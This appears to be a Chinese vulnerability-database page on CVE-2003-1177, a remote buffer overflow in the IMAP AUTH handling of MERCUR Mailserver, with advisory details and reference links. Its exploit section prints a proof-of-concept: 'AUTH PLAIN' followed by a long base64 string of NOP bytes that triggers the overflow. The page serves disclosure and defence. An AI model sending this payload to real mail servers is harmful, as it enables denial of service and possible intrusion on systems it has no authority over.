Atrium Software Mercur Mailserver IMAP AUTH远程缓冲区溢出漏洞

Atrium Software Mercur Mailserver IMAP AUTH远程缓冲区溢出漏洞

漏洞ID 1107539 漏洞类型 边界条件错误
发布时间 2003-10-20 更新时间 2005-10-20
图片[1]-Atrium Software Mercur Mailserver IMAP AUTH远程缓冲区溢出漏洞-安全小百科CVE编号 CVE-2003-1177
图片[2]-Atrium Software Mercur Mailserver IMAP AUTH远程缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200312-089
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/23267
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-089
|漏洞详情
AtriumSoftwareMercurMailserver是一款邮件服务程序。MercurMailserver在处理IMAPAUTH命令时存在问题,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以服务进程权限在系统上执行任意指令。攻击者提交超长IMAPAUTH命令可触发此漏洞,目前没有详细漏洞细节提供。
|漏洞EXP
source: http://www.securityfocus.com/bid/8861/info

A problem has been reported in MERCUR Mailserver when handling the IMAP AUTH command. The issue occurs when an overly long command is submitted, which may be due to a buffer overrun. This problem may make it possible for an attacker to gain unauthorized access to a vulnerable system. 

On the IMAP port:

AUTH PLAIN
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
|参考资料

来源:SECUNIA
名称:10038
链接:http://secunia.com/advisories/10038
来源:XF
名称:mercur-auth-command-dos(13468)
链接:http://xforce.iss.net/xforce/xfdb/13468
来源:BID
名称:8889
链接:http://www.securityfocus.com/bid/8889
来源:BID
名称:8861
链接:http://www.securityfocus.com/bid/8861
来源:www.securiteam.com
链接:http://www.securiteam.com/windowsntfocus/6U00N1P8KC.html
来源:OSVDB
名称:2688
链接:http://www.osvdb.org/2688
来源:FULLDISC
名称:20031024VulnerabilityinMERCURMailServerv4.2SP3andbelow
链接:http://archives.neohapsis.com/archives/fulldisclosure/2003-q4/1459.html
来源:www.atrium-software.com
链接:http://www.atrium-software.com/mail%20server/pub/mcr42sp3a.html
来源:NSFOCUS
名称:5577
链接:http://www.nsfocus.net/vulndb/5577

相关推荐: KDE beta 3重写任意文件漏洞

KDE beta 3重写任意文件漏洞 漏洞ID 1207407 漏洞类型 未知 发布时间 1998-02-06 更新时间 1998-02-06 CVE编号 CVE-1999-1269 CNNVD-ID CNNVD-199802-008 漏洞平台 N/A CVS…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享